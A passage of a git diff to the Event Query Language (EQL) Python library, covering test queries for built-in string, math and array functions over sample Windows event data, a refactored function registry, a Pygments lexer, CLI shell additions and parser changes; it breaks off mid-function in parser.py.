88 and startsWith('explorer.exeaAAAA', 'EXPLORER.exe')''' +expected_event_ids = [88] +description = "check built-in string functions" + +[queries.q130] +query = ''' +file where opcode=0 and stringContains('ABCDEFGHIexplorer.exeJKLMNOP', file_name) +''' +expected_event_ids = [88] +description = "check built-in string functions" + +[queries.q131] +query = ''' +file where opcode=0 and indexOf(file_name, 'plore') == 2 and not indexOf(file_name, '.pf') +''' +expected_event_ids = [88] +description = "check built-in string functions" + +[queries.q132] +query = ''' +file where opcode=0 and indexOf(file_name, 'explorer.') and indexOf(file_name, 'plore', 100) +''' +expected_event_ids = [] +description = "check built-in string functions" + +[queries.q133] +query = ''' +file where opcode=0 and indexOf(file_name, 'plorer.', 0) == 2''' +expected_event_ids = [88, 92] +description = "check built-in string functions" + +[queries.q134] +query = ''' +file where opcode=0 and indexOf(file_name, 'plorer.', 2)''' +expected_event_ids = [88, 92] +description = "check built-in string functions" + +[queries.q135] +query = ''' +file where opcode=0 and indexOf(file_name, 'plorer.', 4)''' +expected_event_ids = [] +description = "check built-in string functions" + +[queries.q136] +query = ''' +file where opcode=0 and indexOf(file_name, 'thing that never happened')''' +expected_event_ids = [] +description = "check built-in string functions" + +[queries.q137] +query = ''' +file where opcode=0 and indexOf(file_name, 'plorer.', 2) == 2''' +expected_event_ids = [88, 92] +description = "check substring ranges" + +[queries.q138] +query = ''' +file where opcode=0 and indexOf(file_name, 'explorer.', 0) == 0''' +expected_event_ids = [88, 92] +description = "check substring ranges" + +[queries.q139] +query = ''' +file where serial_event_id=88 and substring(file_name, 0, 4) == 'expl' +''' +expected_event_ids = [88] +description = "check substring ranges" + +[queries.q140] +query = ''' +file where serial_event_id=88 and substring(file_name, 1, 3) == 'xp' +''' +expected_event_ids = [88] +description = "chaeck substring ranges" + +[queries.q141] +query = ''' +file where serial_event_id=88 and substring(file_name, -4) == '.exe' +''' +expected_event_ids = [88] +description = "check substring ranges" + +[queries.q142] +query = ''' +file where serial_event_id=88 and substring(file_name, -4, -1) == '.ex' +''' +expected_event_ids = [88] +description = "check substring ranges" + +[queries.q143] +query = ''' +process where add(serial_event_id, 0) == 1 and add(0, 1) == serial_event_id''' +expected_event_ids = [1] +description = "test built-in math functions" + +[queries.q144] +query = ''' +process where subtract(serial_event_id, -5) == 6''' +expected_event_ids = [1] +description = "test built-in math functions" + +[queries.q145] +query = ''' +process where multiply(6, serial_event_id) == 30 and divide(30, 4.0) == 7.5''' +expected_event_ids = [5] +description = "test built-in math functions" + +[queries.q146] +query = ''' +process where modulo(11, add(serial_event_id, 1)) == serial_event_id''' +expected_event_ids = [1, 2, 3, 5, 11] +description = "test built-in math functions" + +[queries.q147] +query = ''' +process where serial_event_id == number('5')''' +expected_event_ids = [5] +description = "test string/number conversions" + +[queries.q148] +expected_event_ids = [50] +description = "test string/number conversions" +query = ''' +process where serial_event_id == number('0x32', 16)''' + +[queries.q149] +expected_event_ids = [50] +description = "test string/number conversions" +query = ''' +process where serial_event_id == number('32', 16)''' + +[queries.q150] +query = ''' +process where number(serial_event_id) == number(5)''' +expected_event_ids = [5] +description = "test string/number conversions" + +[queries.q151] +query = ''' +process where concat(serial_event_id, ':', process_name, opcode) == '5:winINIT.exe3' +''' +expected_event_ids = [5] +description = "test string concatenation" + +[queries.q152] +query = ''' +process where process_name != original_file_name +| filter length(original_file_name) > 0''' +expected_event_ids = [] +description = "check that case insensitive comparisons are performed for fields." + +[queries.q153] +query = ''' +sequence by unique_pid [process where opcode=1 and process_name == 'msbuild.exe'] [network where true]''' +expected_event_ids = [75273, 75304] +description = "test that process sequences are working correctly" + +[queries.q154] +expected_event_ids = [57] +description = "test arraySearch functionality for lists of strings, and lists of objects" +query = ''' +registry where arraySearch(bytes_written_string_list, a, a == 'en-us')''' + +[queries.q155] +expected_event_ids = [57] +description = "test arraySearch functionality for lists of strings, and lists of objects" +query = ''' +registry where arraySearch(bytes_written_string_list, a, endsWith(a, '-us'))''' + +[queries.q156] +expected_event_ids = [75305] +description = "test arraySearch - true" +query = ''' +network where mysterious_field + and arraySearch(mysterious_field.subarray, s, true) +''' + +[queries.q157] +expected_event_ids = [] +description = "test arraySearch - false" +query = ''' +network where mysterious_field and arraySearch(mysterious_field.subarray, s, false) +''' + +[queries.q158] +expected_event_ids = [75305] +description = "test arraySearch - conditional" +query = ''' +network where mysterious_field and arraySearch(mysterious_field.subarray, s, s.a == 's0-*') +''' + +[queries.q159] +expected_event_ids = [75305] +description = "test arraySearch - conditional" +query = ''' +network where mysterious_field and arraySearch(mysterious_field.subarray, s, s.a != 's0-*') +''' + +[queries.q160] +expected_event_ids = [75305] +description = "test arraySearch - nested" +query = ''' +network where mysterious_field + and arraySearch(mysterious_field.subarray, sub1, + arraySearch(sub1.c, nested, nested.x.y == '*')) +''' + +[queries.q161] +expected_event_ids = [75305] +description = "test arraySearch - nested with cross-check pass" +query = ''' +network where mysterious_field + and arraySearch(mysterious_field.subarray, sub1, + sub1.a == 's0-a' and arraySearch(sub1.c, nested, nested.z == 's0-c1-x-z')) +''' + +[queries.q162] +expected_event_ids = [75305] +description = "test arraySearch - nested with cross-check pass" +query = ''' +network where mysterious_field + and arraySearch(mysterious_field.subarray, sub1, + sub1.a == 's0-a' and arraySearch(sub1.c, nested, nested.z == sub1.cross_match)) +''' + +[queries.q163] +expected_event_ids = [75305] +description = "test arraySearch - nested with cross-check pass" +query = ''' +network where mysterious_field + and arraySearch(mysterious_field.subarray, sub1, + arraySearch(sub1.c, nested, nested.x.y == mysterious_field.outer_cross_match)) +''' + +[queries.q164] +expected_event_ids = [] +description = "test 'safe()' wrapper for exception handling" +query = ''' +network where safe(divide(process_name, process_name)) +''' + +[queries.q165] +query = ''' +file where serial_event_id == 82 and (true == (process_name in ('svchost.EXE', 'bad.exe', 'bad2.exe'))) +''' +expected_event_ids = [82] +description = "nested set comparisons" + +[queries.q166] +expected_event_ids = [57] +query = ''' +registry where arrayCount(bytes_written_string_list, s, s == '*-us') == 1 +''' + +[queries.q167] +expected_event_ids = [57] +query = ''' +registry where arrayCount(bytes_written_string_list, s, s == '*en*') == 2 +''' + +[queries.q168] +expected_event_ids = [57] +query = ''' +registry where arrayContains(bytes_written_string_list, "ross", "en-US") +''' + +[queries.q169] +expected_event_ids = [11, 50] +description = "test window pipe" +query = ''' +process where subtype == "create" | +window 5m | +unique parent_process_name, process_name | +unique_count parent_process_name | +filter count == 5 +''' + +[queries.q170] +expected_event_ids = [55] +description = "test window pipe with descendant" +query = ''' +file where event_subtype_full == "file_create_event" + and descendant of [process where process_name == "cmd.exe"] | + window 5m | + unique_count process_name | + filter count == 5 +''' diff --git a/eql/events.py b/eql/events.py new file mode 100644 index 0000000..a00ba60 --- /dev/null +++ b/eql/events.py @@ -0,0 +1,43 @@ +"""Base class for constructing an analytic engine with analytics.""" +from collections import namedtuple + +from .schema import EVENT_TYPE_GENERIC +from .utils import is_string + + +class Event(namedtuple('Event', ['type', 'time', 'data'])): + """Event for python engine in EQL.""" + + @classmethod + def from_data(cls, data): + """Load an event from a dictionary. + + :param dict data: Dictionary with the event type, time, and keys. + """ + data = data.get('data_buffer', data) + timestamp = data.get('timestamp', 0) + + if is_string(data.get('event_type')): + event_type = data['event_type'] + elif 'event_type_full' in data: + event_type = data['event_type_full'] + if event_type.endswith('_event'): + event_type = event_type[:-len('_event')] + else: + event_type = EVENT_TYPE_GENERIC + + return cls(event_type, timestamp, data) + + def copy(self): + """Create a copy of the event.""" + data = self.data.copy() + return Event(self.type, self.time, data) + + +class AnalyticOutput(namedtuple('AnalyticOutput', ['analytic_id', 'events'])): + """AnalyticOutput for python engine in EQL.""" + + @classmethod + def from_data(cls, events, analytic_id=None): # type: (list[dict], str) -> AnalyticOutput + """Load up an analytic output event.""" + return cls(analytic_id, [Event.from_data(e) for e in events]) diff --git a/eql/functions.py b/eql/functions.py index 4dce625..6083fc9 100644 --- a/eql/functions.py +++ b/eql/functions.py @@ -1,20 +1,436 @@ """EQL functions.""" -builtins = ( - "add", - "arrayContains", - "arraySearch", - "concat", - "divide", - "endsWith", - "indexOf", - "length", - "modulo", - "multiply", - "number", - "startsWith", - "string", - "stringContains", - "substring", - "subtract", - "wildcard", +import re + +from .signatures import SignatureMixin +from .errors import EqlError +from .types import ( + STRING, NUMBER, BOOLEAN, VARIABLE, ARRAY, literal, PRIMITIVES, EXPRESSION, PRIMITIVE_ARRAY, is_literal, is_dynamic ) +from .utils import is_string, to_unicode, is_number + + +_registry = {} + + +def register(func): + """Register a function signature.""" + if func.name in _registry: + raise EqlError(u"Function {func.name} already registered. Unable to register {func}".format(func=func)) + + _registry[func.name] = func + return func + + +def list_functions(): + """Get a list of all current functions.""" + return list(sorted(_registry)) + + +class FunctionSignature(SignatureMixin): + """Helper class for declaring function signatures.""" + + name = str() + return_value = BOOLEAN + + @classmethod + def get_callback(cls, *arguments): + """Get a callback function for the AST.""" + return cls.run + + @classmethod + def run(cls, *arguments): + """Reference implementation of the function.""" + raise NotImplementedError() + + +def get_function(name): # type: (str) -> FunctionSignature + """Find a function in the registry.""" + return _registry.get(name) + + +# noinspection PyAbstractClass +class DynamicFunctionSignature(FunctionSignature): + """Function signature that can only be processed in a transpiler.""" + + @classmethod + def get_callback(cls, *arguments): + """Get a callback function for the AST.""" + raise NotImplementedError("Function {} can only be processed in a transpiler".format(cls.name)) + + +# noinspection PyAbstractClass +class MathFunctionSignature(FunctionSignature): + """Base signature for math functions.""" + + argument_types = [NUMBER, NUMBER] + return_value = NUMBER + + +@register +class Add(MathFunctionSignature): + """Add two numbers together.""" + + name = "add" + + @classmethod + def run(cls, x, y): + """Add two variables together.""" + if is_number(x) and is_number(y): + return x + y + + +@register +class ArrayContains(FunctionSignature): + """Check if ``value`` is a member of the array ``some_array``.""" + + name = "arrayContains" + argument_types = [PRIMITIVE_ARRAY, PRIMITIVES] + return_value = BOOLEAN + additional_types = PRIMITIVES + + @classmethod + def run(cls, array, *value): + """Search an array for a literal value.""" + values = [v.lower() if is_string(v) else v for v in value] + + if array is not None: + for v in array: + if is_string(v) and v.lower() in values: + return True + elif v in values: + return True + return False + + +@register +class ArrayCount(DynamicFunctionSignature): + """Search for matches to a dynamic expression in an array.""" + + name = "arrayCount" + argument_types = [ARRAY, VARIABLE, EXPRESSION] + return_value = NUMBER + + +@register +class ArraySearch(DynamicFunctionSignature): + """Search for matches to a dynamic expression in an array.""" + + name = "arraySearch" + argument_types = [ARRAY, VARIABLE, EXPRESSION] + return_value = BOOLEAN + + +@register +class Concat(FunctionSignature): + """Concatenate multiple values as strings.""" + + name = "concat" + additional_types = PRIMITIVES + minimum_args = 1 + return_value = STRING + + @classmethod + def run(cls, *arguments): + """Concatenate multiple values as strings.""" + output = [to_unicode(arg) for arg in arguments] + return "".join(output) + + +@register +class Divide(MathFunctionSignature): + """Divide numeric values.""" + + name = "divide" + + @classmethod + def run(cls, x, y): + """Divide numeric values.""" + if is_number(x) and is_number(y): + return float(x) / float(y) + + +@register +class EndsWith(FunctionSignature): + """Check if a string ends with a substring.""" + + name = "endsWith" + argument_types = [STRING, STRING] + return_value = BOOLEAN + + @classmethod + def run(cls, source, substring): + """Check if a string ends with a substring.""" + if is_string(source) and is_string(substring): + return source.lower().endswith(substring.lower()) + + +@register +class IndexOf(FunctionSignature): + """Check the start position of a substring.""" + + name = "indexOf" + argument_types = [STRING, STRING, NUMBER] + return_value = NUMBER + minimum_args = 2 + + @classmethod + def run(cls, source, substring, start=None): + """Check the start position of a substring.""" + if start is None: + start = 0 + + if is_string(source) and is_string(substring): + source = source.lower() + substring = substring.lower() + if substring in source[start:]: + return source.index(substring, start) + + +@register +class Length(FunctionSignature): + """Get the length of an array or string.""" + + name = "length" + argument_types = [(STRING, ARRAY)] + return_value = NUMBER + + @classmethod + def run(cls, array): + """Get the length of an array or string.""" + if is_string(array) or isinstance(array, (dict, list, tuple)): + return len(array) + return 0 + + +@register +class Match(FunctionSignature): + """Perform regular expression matching on a string.""" + + name = "match" + argument_types = [STRING, literal(STRING)] + return_value = BOOLEAN + additional_types = literal(STRING) + + @classmethod + def join_regex(cls, *regex): + """Convert a list of wildcards to a regular expression.""" + return "|".join(regex) + + @classmethod + def get_callback(cls, source_ast, *regex_literals): + """Get a callback function that uses the compiled regex.""" + regs = [reg.value for reg in regex_literals] + compiled = re.compile("|".join(regs), re.IGNORECASE | re.UNICODE) + + def callback(source, *_): + return is_string(source) and compiled.match(source) is not None + + return callback + + @classmethod + def validate(cls, arguments, type_hints=None): + """Validate the calling convention and change the argument order if necessary.""" + # used to have just two arguments and the pattern was on the left and expression on the right + if len(arguments) == 2 and type_hints and is_literal(type_hints[0]) and is_dynamic(type_hints[1]): + arguments = list(reversed(arguments)) + type_hints = list(reversed(type_hints)) + return super(Match, cls).validate(arguments, type_hints) + + @classmethod + def run(cls, source, *matches): + """Compare a string against a list of wildcards.""" + if isinstance(source, bytes): + source = source.decode("utf-8", "ignore") + + if is_string(source): + match = re.match("|".join(matches), source, re.IGNORECASE | re.UNICODE | re.MULTILINE | re.DOTALL) + return match is not None + + +@register +class MatchLite(Match): + """Perform lightweight regular expression matching on a string.""" + + name = "matchLite" + + +@register +class Modulo(MathFunctionSignature): + """Divide numeric values.""" + + name = "modulo" + + @classmethod + def run(cls, x, y): + """Divide numeric values.""" + if is_number(x) and is_number(y): + return x % y + + +@register +class Multiply(MathFunctionSignature): + """multiply numeric values.""" + + name = "multiply" + + @classmethod + def run(cls, x, y): + """Multiply numeric values.""" + if is_number(x) and is_number(y): + return x * y + + +@register +class Safe(FunctionSignature): + """Evaluate an expression and suppress exceptions.""" + + name = "safe" + argument_types = [EXPRESSION] + return_value = EXPRESSION + + +@register +class StartsWith(FunctionSignature): + """Check if a string starts with a substring.""" + + name = "startsWith" + argument_types = [STRING, STRING] + return_value = BOOLEAN + + @classmethod + def run(cls, source, substring): + """Check if a string ends with a substring.""" + if is_string(source) and is_string(substring): + return source.lower().startswith(substring.lower()) + + +@register +class StringContains(FunctionSignature): + """Check if a string is a substring of another.""" + + name = "stringContains" + argument_types = [STRING, STRING] + return_value = BOOLEAN + + @classmethod + def run(cls, source, substring): + """Check if a string is a substring of another.""" + if is_string(source) and is_string(substring): + return substring.lower() in source.lower() + return False + + +@register +class Substring(FunctionSignature): + """Extract a substring.""" + + name = "substring" + argument_types = [STRING, NUMBER, NUMBER] + return_value = STRING + minimum_args = 1 + + @classmethod + def run(cls, a, start=None, end=None): + """Extract a substring.""" + if is_string(a): + return a[start:end] + + +@register +class Subtract(MathFunctionSignature): + """Subtract two numbers.""" + + name = "subtract" + + @classmethod + def run(cls, x, y): + """Add two variables together.""" + if is_number(x) and is_number(y): + return x - y + + +@register +class ToNumber(FunctionSignature): + """Convert a string to a number.""" + + name = "number" + argument_types = [(STRING, NUMBER), NUMBER] + return_value = NUMBER + minimum_args = 1 + + @classmethod + def run(cls, source, base=10): + """Convert a string to a number.""" + if source is None: + return 0 + elif is_number(source): + return source + elif is_string(source): + if source.isdigit(): + return int(source, base) + elif source.startswith("0x"): + return int(source[2:], 16) + elif len(source.split(".")) == 2: + return float(source) + + +@register +class ToString(FunctionSignature): + """Convert a value to a string.""" + + name = "string" + argument_types = [PRIMITIVES] + return_value = STRING + + @classmethod + def run(cls, source): + """"Convert a value to a string.""" + return to_unicode(source) + + +@register +class Wildcard(FunctionSignature): + """Perform glob matching on a string.""" + + name = "wildcard" + argument_types = [STRING, literal(STRING)] + return_value = BOOLEAN + additional_types = literal(STRING) + + @classmethod + def to_regex(cls, *wildcards): + """Convert a list of wildcards to a regular expression.""" + expressions = [] + head = "^" + tail = "$" + + for wildcard in wildcards: + pieces = [re.escape(p) for p in wildcard.lower().split('*')] + regex = head + '.*?'.join(pieces) + tail + + tail_skip = '.*?$' + + if regex.endswith(tail_skip): + regex = regex[:-len(tail_skip)] + expressions.append(regex) + + return "|".join(expressions) + + @classmethod + def get_callback(cls, source_ast, *wildcard_literals): + """Get a callback function that uses the compiled regex.""" + wc_values = [wc.value for wc in wildcard_literals] + pattern = cls.to_regex(*wc_values) + compiled = re.compile(pattern, re.IGNORECASE | re.UNICODE) + + def callback(source, *_): + return is_string(source) and compiled.match(source) is not None + + return callback + + @classmethod + def run(cls, source, *wildcards): + """Compare a string against a list of wildcards.""" + pattern = cls.to_regex(*wildcards) + compiled = re.compile(pattern, re.IGNORECASE | re.UNICODE | re.MULTILINE | re.DOTALL) + return is_string(source) and compiled.match(source) is not None diff --git a/eql/highlighters.py b/eql/highlighters.py new file mode 100644 index 0000000..ce29c41 --- /dev/null +++ b/eql/highlighters.py @@ -0,0 +1,68 @@ +"""Highlighters for EQL.""" +from pygments.lexer import RegexLexer, bygroups, include +from pygments import token +from eql.functions import list_functions +from eql.pipes import list_pipes + + +class EqlLexer(RegexLexer): + """Pygments Lexer for EQL.""" + + name = 'Event Query Language' + aliases = ['eql'] + filenames = ['*.eql'] + + _sign = r'[\-+]' + _integer = r'\d+' + _float = r'\d*\.\d+([Ee][-+]?\d+)?' + _time_units = r's|sec\w+|m|min\w+|h|hour|hr|d|day' + _name = r'[a-zA-Z][_a-zA-Z0-9]*' + _pipe_names = set(list_pipes()) + + tokens = { + 'comments': [ + (r'//(\n|[\w\W]*?[^\\]\n)', token.Comment.Single), + (r'/[*][\w\W]*?[*]/', token.Comment.Multiline), + (r'/[*][\w\W]*', token.Comment.Multiline), + ], + 'whitespace': [ + (r'\s+', token.Whitespace), + ], + 'root': [ + include('whitespace'), + include('comments'), + (r'(and|in|not|or)\b', token.Operator.Word), # Keyword.Pseudo can also work + (r'(join|sequence|until|where)\b', token.Keyword), + (r'(%s)(=\s+)(where)\b' % _name, bygroups(token.Name, token.Whitespace, token.Keyword)), + (r'(const)(\s+)(%s)\b' % _name, bygroups(token.Keyword.Declaration, token.Whitespace, token.Name.Constant)), + (r'(macro)(\s+)(%s)\b' % _name, bygroups(token.Keyword.Declaration, token.Whitespace, token.Name.Constant)), + (r'(by|of|with)\b', token.Keyword.QueryModifier), + (r'(true|false|null)\b', token.Name.Builtin), + + # built in pipes + (r'(\|)(\s*)(%s)' % '|'.join(reversed(sorted(_pipe_names, key=len))), + bygroups(token.Operator, token.Whitespace, token.Name.Function.Magic)), + + # built in functions + (r'(%s)(\s*\()' % '|'.join(list_functions()), bygroups(token.Name.Function, token.Text)), + + # all caps names + (r'[A-Z][_A-Z0-9]+\b', token.Name.Other), + (_name, token.Name), + + # time units + (r'(%s|%s)[ \t]*(%s)\b' % (_float, _integer, _time_units), token.Literal.Date), + + (_sign + '?' + _float, token.Number.Float), + (_sign + '?' + _integer, token.Number.Integer), + + # Continue matching strings until they are closed + (r'"(\\[btnfr"\'\\]|[^\r\n"\\])*"?', token.String), + (r"'(\\[btnfr'\"\\]|[^\r\n'\\])*'?", token.String), + (r'\?"(\\"|[^"])*"?', token.String.Regex), + (r"\?'(\\'|[^'])*'?", token.String.Regex), + + (r'(==|=|!=|<|<=|>=|>)', token.Operator), + (r'[()\[\],.]', token.Punctuation), + ] + } diff --git a/eql/loader.py b/eql/loader.py index 0428817..a3137aa 100644 --- a/eql/loader.py +++ b/eql/loader.py @@ -1,7 +1,7 @@ """Serialize analytics to and from disk.""" -from eql.ast import EqlAnalytic # noqa -from eql.parser import parse_analytic, parse_analytics -from eql.utils import load_dump, save_dump +from .ast import EqlAnalytic # noqa +from .parser import parse_analytic, parse_analytics +from .utils import load_dump, save_dump def load_analytic(filename): diff --git a/eql/main.py b/eql/main.py index 573db2b..3566160 100644 --- a/eql/main.py +++ b/eql/main.py @@ -6,13 +6,20 @@ import os import sys -from eql.engines.build import render_engine -from eql.engines.native import PythonEngine -from eql.errors import EqlError -from eql.loader import load_analytics, save_analytics -from eql.parser import parse_query -from eql.schema import use_schema -from eql.utils import load_dump, stream_stdin_events, stream_file_events +from .build import render_engine +from .engine import PythonEngine +from .errors import EqlError +from .loader import load_analytics, save_analytics +from .parser import parse_query +from .transpilers import TextEngine +from .utils import load_dump, stream_stdin_events, stream_file_events +from .walkers import ConfigurableWalker + +BANNER = "\n".join([ + "===================", + " EQL SHELL ", + "===================", +]) def build(args): @@ -20,9 +27,10 @@ def build(args): config = load_dump(args.config) if args.config else {} _, ext = os.path.splitext(args.output_file) - ext = ext[len(os.extsep):] + engine_type = (args.engine_type or ext).lstrip(".") + walker = ConfigurableWalker(config) - with use_schema(config.get('schema')): + with walker.schema: if '*' in args.input_file: analytics = [] for input_file in glob.glob(args.input_file): @@ -30,9 +38,15 @@ def build(args): else: analytics = load_analytics(args.input_file) - if ext in ('yml', 'yaml', 'json'): + if engine_type in ('yml', 'yaml', 'json'): save_analytics(analytics, args.output_file) else: + try: + TextEngine.extensions[engine_type] + except KeyError: + print(u"Unknown extension {}".format(engine_type), file=sys.stderr) + return 2 + output = render_engine(analytics, engine_type=ext, config=config, analytics_only=args.analytics_only) with open(args.output_file, "w") as f: f.write(output) @@ -50,41 +64,71 @@ def query(args): config.update(load_dump(args.config)) engine = PythonEngine(config) - try: - eql_query = parse_query(args.query, implied_any=True, implied_base=True) - engine.add_query(eql_query) - except EqlError as e: - print(e, file=sys.stderr) - sys.exit(2) + + with engine.schema: + try: + eql_query = parse_query(args.query, implied_any=True, implied_base=True) + engine.add_query(eql_query) + except EqlError as e: + print(e, file=sys.stderr) + sys.exit(2) engine.stream_events(stream, finalize=False) engine.finalize() +def shell_main(args): + """Entry point for the EQL shell.""" + from .shell import EqlShell + shell = EqlShell() + + print(BANNER) + + if args.config: + shell.do_config(args.config) + + if args.file: + shell.do_input(args.file) + + shell.cmdloop() + + def main(args=None): """Entry point for EQL command line utility.""" import eql parser = argparse.ArgumentParser(description='Event Query Language') parser.add_argument('--version', '-V', action='version', version='%s %s' % (eql.__name__, eql.__version__)) + subparsers = parser.add_subparsers(help='Sub Command Help') build_parser = subparsers.add_parser('build', help='Build an EQL engine in a target language') build_parser.set_defaults(func=build) build_parser.add_argument('input_file', help='Input analytics file(s) (.yml or .json)') build_parser.add_argument('output_file', help='Output analytics engine file') - build_parser.add_argument('--config', help='Engine configuration') + build_parser.add_argument('--engine_type', help='Engine type. Autodetected from output extension if not provided') build_parser.add_argument('--analytics-only', action='store_true', help='Skips core engine when building target') - query_parser = subparsers.add_parser('query', help='Query an EQL engine in a target language') + query_parser = subparsers.add_parser('query', help='Run an EQL query over stdin or a data file') query_parser.set_defaults(func=query) query_parser.add_argument('query', help='The EQL query to run over the log file') - query_parser.add_argument('--file', '-f', help='Target file(s) to query with EQL') query_parser.add_argument('--encoding', '-e', help='Encoding of input file', default="utf8") query_parser.add_argument('--format', help='', choices=['json', 'jsonl', 'json.gz', 'jsonl.gz']) - query_parser.add_argument('--config', help='Engine configuration') + + shell_parser = subparsers.add_parser('shell', help='Run an EQL query over stdin or a data file') + shell_parser.set_defaults(func=shell_main) + + for p in (parser, build_parser, query_parser, shell_parser): + p.add_argument('--config', '-c', help='Engine configuration') + + for p in (parser, query_parser, shell_parser): + p.add_argument('--file', '-f', help='Target file(s) to query with EQL') parsed = parser.parse_args(args) - # this won't necessarily be set in python3 - if hasattr(parsed, 'func'): - parsed.func(parsed) + try: + if hasattr(parsed, 'func'): + return parsed.func(parsed) + else: + return shell_main(parsed) + except KeyboardInterrupt: + pass diff --git a/eql/parser.py b/eql/parser.py index cf402ee..fc908a8 100644 --- a/eql/parser.py +++ b/eql/parser.py @@ -2,7 +2,10 @@ from __future__ import unicode_literals import datetime +import re +import sys from collections import OrderedDict +import threading import tatsu import tatsu.exceptions @@ -10,24 +13,34 @@ import tatsu.semantics import tatsu.walkers -from eql.ast import * # noqa: F401 -from eql.errors import ParseError, SchemaError -from eql.etc import get_etc_file -from eql.schema import EVENT_TYPE_ANY, check_event_name -from eql.utils import is_string, to_unicode - +from . import ast +from . import pipes +from . import types +from .errors import EqlParseError, EqlSyntaxError, EqlSemanticError, EqlSchemaError, EqlTypeMismatchError, EqlError +from .etc import get_etc_file +from .functions import get_function, list_functions +from .schema import EVENT_TYPE_ANY, EVENT_TYPE_GENERIC, Schema +from .utils import to_unicode, load_extensions, ParserConfig, is_string __all__ = ( "get_preprocessor", "parse_definition", "parse_definitions", "parse_expression", + "parse_field", + "parse_literal", "parse_query", "parse_analytic", "parse_analytics", + "ignore_missing_fields", + "ignore_missing_functions", + "strict_field_schema", + "allow_enum_fields", ) +debugger_attached = 'pydevd' in sys.modules + # Used for time units SECOND = 1 MINUTE = 60 * SECOND @@ -43,15 +56,41 @@ 'day': DAY } +RESERVED = {n.render(): n for n in [ast.Boolean(True), ast.Boolean(False), ast.Null()]} GRAMMAR = None -tatsu_parser = None +compiled_parser = None +compiler_lock = threading.Lock() + +NON_SPACE_WS = re.compile(r"[^\S ]+") + + +ignore_missing_functions = ParserConfig(check_functions=False) +ignore_missing_fields = ParserConfig(ignore_missing_fields=False) +strict_field_schema = ParserConfig(strict_fields=True, implied_booleans=False) +allow_enum_fields = ParserConfig(enable_enum=True) + + +local = threading.local() + +try: + from ._parsergen import EQLParser # noqa: E402 + local.parser = EQLParser(parseinfo=True, semantics=tatsu.semantics.ModelBuilderSemantics()) +except ImportError: + pass + + +def transpose(iter): + """Transpose iterables.""" + if not iter: + return [], [] + return [list(t) for t in zip(*iter)] class EqlWalker(tatsu.walkers.NodeWalker): """Walker of Tatsu semantic model to convert it into a EQL AST.""" - def __init__(self, implied_base=False, implied_any=False, subqueries=True, pipes=True, preprocessor=None): + def __init__(self): """Walker for building an EQL syntax tree from a Tatsu syntax tree. :param bool implied_any: Allow for event queries to skip event type and WHERE, replace with 'any where ...' @@ -61,60 +100,244 @@ def __init__(self, implied_base=False, implied_any=False, subqueries=True, pipes :param PreProcessor preprocessor: Use an EQL preprocessor to expand definitions and constants while parsing """ super(EqlWalker, self).__init__() - self.implied_base = implied_base - self.implied_any = implied_any - self.preprocessor = preprocessor or PreProcessor() - self._eql_walker = AstWalker() - self._subqueries_enabled = subqueries - self._pipes_enabled = pipes + self.implied_base = ParserConfig.read_stack("implied_base", False) + self.implied_any = ParserConfig.read_stack("implied_any", False) + + # Create our own thread-safe copy of a preprocessor that we can use + self.preprocessor = ParserConfig.read_stack("preprocessor", ast.PreProcessor()).copy() + + # Keep track of newly created definitions + self.new_preprocessor = self.preprocessor.copy() + + self._subqueries_enabled = ParserConfig.read_stack("allow_subqueries", True) + self._pipes_enabled = ParserConfig.read_stack("allow_pipes", True) + self._function_lookup = {} + + # Allow for functions to be turned on/off and overridden + for name in ParserConfig.read_stack("allowed_functions", list_functions()): + self._function_lookup[name] = get_function(name) + + for signature in ParserConfig.read_stack("custom_functions", []): + self._function_lookup[signature.name] = signature + + self._allowed_pipes = ParserConfig.read_stack("allowed_pipes", set(pipes.list_pipes())) + self._implied_booleans = ParserConfig.read_stack("implied_booleans", True) + self._in_pipes = False + self._event_types = [] + self._schema = Schema.current() + self._ignore_missing = ParserConfig.read_stack("ignore_missing_fields", False) + self._strict_fields = ParserConfig.read_stack("strict_fields", False) + self._allow_enum = ParserConfig.read_stack("enable_enum", False) + self._count_keys = [] + self._pipe_schemas = [] + self._var_types = dict() + self._check_functions = ParserConfig.read_stack("check_functions", True) + + @property + def multiple_events(self): + """Check if multiple events can be queried.""" + return len(self._pipe_schemas) > 1 + + @property + def event_type(self): + """Get the active event type.""" + if not self._event_types: + return EVENT_TYPE_ANY + return self._event_types[-1] @staticmethod - def _error(node, message, end=False, cls=ParseError): - """Callback function to walk the AST.""" + def _error(node, message, end=False, cls=EqlSemanticError, width=None, **kwargs): + """Generate.""" params = dict(node.ast) for k, value in params.items(): if isinstance(value, list): - params[k] = ', '.join([v.render() if isinstance(v, EqlNode) else to_unicode(v) for v in value]) + params[k] = ', '.join([v.render() if isinstance(v, ast.EqlNode) else to_unicode(v) for v in value]) + params.update(kwargs) message = message.format(**params) - lines = node.parseinfo.text_lines() line_number = node.parseinfo.line - if line_number >= len(lines): - line_number = len(lines) - 1 - bad_line = lines[line_number].rstrip() - pos = node.parseinfo.endpos if end else node.parseinfo.pos - return cls(message, line_number, pos, bad_line) + + # get more lines for more informative error messages. three before + two after + before = node.parseinfo.buffer.get_lines(0, line_number)[-3:] + after = node.parseinfo.buffer.get_lines(line_number+1)[:2] + + source = '\n'.join(b.rstrip('\r\n') for b in before) + trailer = '\n'.join(a.rstrip('\r\n') for a in after) + + # lines = node.parseinfo.text_lines() + # source = '\n'.join(l.rstrip() for l in lines) + col = node.line_info.col + + # Determine if the error message can easily look like this + # ^^^^ + if width is None and not end: + if not NON_SPACE_WS.search(node.text): + width = len(node.text) + + if width is None: + width = 1 + + return cls(message, line_number, col, source, width=width, trailer=trailer) + + @classmethod + def _type_error(cls, node, message, expected_type, actual_type=None, **kwargs): + """Return an exception for type mismatches.""" + kwargs.setdefault('cls', EqlTypeMismatchError) + expected_spec = types.get_specifier(expected_type) + + def get_friendly_name(t, show_spec=False): + type_str = "" + spec = types.get_specifier(t) + + if show_spec and spec != types.NO_SPECIFIER: + type_str += spec + " " + + t = types.union_types(types.get_type(t)) + if not types.is_union(t): + t = (t, ) + + # now get a friendly name for all of the types + type_strings = [] + for union_type in t: + if isinstance(union_type, types.Nested): + type_strings.append("object") + elif isinstance(union_type, types.Array): + if len(union_type) != 1: + type_strings.append("array") + else: + type_strings.append("array[{}]".format(get_friendly_name(union_type, show_spec=False))) + elif len(t) == 1 or union_type != "null": + type_strings.append(to_unicode(union_type)) + + return (type_str + "/".join(sorted(set(type_strings)))).strip() + + expected_type = get_friendly_name(expected_type, show_spec=True) + + if actual_type is not None: + actual_spec = types.get_specifier(actual_type) + spec_match = types.check_specifiers(expected_spec, actual_spec) + expected_type = get_friendly_name(expected_type, show_spec=not spec_match) + actual_type = get_friendly_name(actual_type, show_spec=not spec_match) 